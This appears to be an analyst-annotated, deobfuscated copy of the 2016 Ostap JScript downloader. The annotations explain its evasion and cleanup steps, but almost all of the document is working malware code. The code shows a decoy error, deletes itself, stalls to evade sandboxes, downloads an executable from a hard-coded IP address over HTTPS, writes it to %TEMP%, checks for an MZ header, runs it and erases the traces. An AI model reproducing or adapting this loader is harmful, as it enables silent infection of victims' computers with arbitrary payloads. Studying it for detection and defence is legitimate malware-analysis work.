2016 Ostap Deobfuscated (q64.php)
// Analyst annotations for a deobfuscated Windows Script Host (JScript) downloader.
// Flow as written: show a decoy error and delete the script, stall in a counting
// loop, fetch a payload over HTTPS, write it to %TEMP%, check for an 'MZ' header,
// launch it, then remove the script and the dropped file. Identifiers are leftovers
// from the obfuscator and carry no meaning.

// Host objects are looked up by string key on `this`; the COM objects below give
// the script shell, file-system, binary-stream and HTTP access.
var pre_Additionally6 = this['ActiveXObject'];
var pre_communicating = this['WScript'];
var pre_information = pre_communicating['CreateObject']('WScript.Shell');
var pre_full = new pre_Additionally6('Scripting.FileSystemObject');
var fstream = new pre_Additionally6('ADODB.Stream');
var oShell = new pre_Additionally6('Shell.Application');
var pre_sources = pre_information['ExpandEnvironmentStrings']('%TEMP%');
// Drop path: %TEMP% plus a random integer in 1..100 (the summed constants equal 100)
// with an .exe extension. The literal yields a doubled backslash separator.
var filepath = pre_sources + '\\\\' + Math['floor'](Math['random']() * (20 + 20 + 5 + 5 + 25 + 25) + 1) + '.exe';
var pre_information6 = new pre_Additionally6('Msxml2.ServerXMLHTTP');
var body12 = '\\aflash_update.js';
// 3 + 2 + 2 = 7, the Shell.Application special-folder id for the user's Startup folder.
var startupFolder = oShell['NameSpace'](3 + 2 + 2);
var pre_that = false;
var pre_with = false;
var tone = 1;
var filets = null;
var pre_network0 = '';
// pre_with is re-declared here and now holds the running script's full path; it is
// reused further down as the "payload launched" flag.
var pre_with = pre_communicating['ScriptFullName'];
// Expected location of a copy in the Startup folder. Nothing in this listing writes
// to that path, so any persistence step is not visible here.
var pre_includes = startupFolder.Self.Path + body12;
// Payload URL: HTTPS to a bare IP address with a fixed query string.
var pre_computer9 = 'https://217.28.218.217/YOP634EFARRR/q64.php?add=gtyhbncdfewpnjm9oklmnfdrtqdczdfgrt';
// When not running from the Startup path: delete the script file, show a decoy
// "corrupted document" message, and wait 5 seconds.
if (pre_with != pre_includes && pre_that == false) {
pre_that = true;
pre_full['DeleteFile'](pre_with);
pre_communicating['echo']('The document is corrupted and cannot be opened');
pre_communicating['Sleep'](5000);
}
// Counting loop: no network activity happens until `tone` reaches 300000000.
// NOTE(review): presumably a stalling delay to outlast short sandbox runs - not
// stated in the code itself.
while (true) {
tone = tone + 1;
if (tone == 300000000) {
// Retry loop: repeats until a payload has been launched (see the pre_with check below).
while (true) {
try {
// NOTE(review): option 3 on ServerXMLHTTP appears to be the client-certificate
// selection option - confirm against the MSXML documentation.
pre_information6['setOption'](3, 'MSXML');
// Synchronous GET (third argument false); a random 1..200 value is appended to the query.
pre_information6['open']('GET', pre_computer9 + '&' + Math['floor'](Math['random']() * 200 + 1), false);
pre_information6['send']();
// 100 + 50 + 50 = 200: proceed only on HTTP 200.
if (pre_information6['status'] == 100 + 50 + 50) {
if (pre_full['FileExists'](filepath))
pre_full['DeleteFile'](filepath);
// Write the raw response body to the drop path through ADODB.Stream
// (Type 1 = binary).
fstream['Open']();
fstream['Type'] = 1;
fstream['Write'](pre_information6['responseBody']);
fstream['Position'] = 0;
fstream['SaveToFile'](filepath);
fstream['Close']();
// Re-open the dropped file for reading and require the first two characters to be
// 'MZ' (the DOS/PE executable magic) before launching it.
filets = pre_full['GetFile'](filepath)['OpenAsTextStream'](1);
if (pre_full['FileExists'](filepath) && filets['ReadLine']()['substring'](0, 2) == 'MZ') {
pre_with = true;
oShell['ShellExecute'](filepath, '', '', 'open', '1');
// Cleanup: delete the script if it still exists, wait 4 seconds (20 * 200 ms), then
// try to delete the dropped file.
// NOTE(review): `filets` is still open at this point, so the second delete may throw
// and be swallowed by the empty catch below - verify on a test host.
if (pre_full['FileExists'](pre_communicating['ScriptFullName']))
pre_full['DeleteFile'](pre_communicating['ScriptFullName']);
pre_communicating['Sleep'](20 * 200);
if (pre_full['FileExists'](filepath))
pre_full['DeleteFile'](filepath);
}
filets['Close']();
}
// Every error (network, file, COM) is silently discarded; the loop simply retries.
} catch (e) {
}
// pre_with is the boolean true only after a launch; until then it is the script
// path string, which does not compare equal to true.
if (pre_with == true) {
break;
}
// 10000 * 8 ms = 80 seconds between download attempts.
pre_communicating['Sleep'](10000 * 8);
}
break;
}
}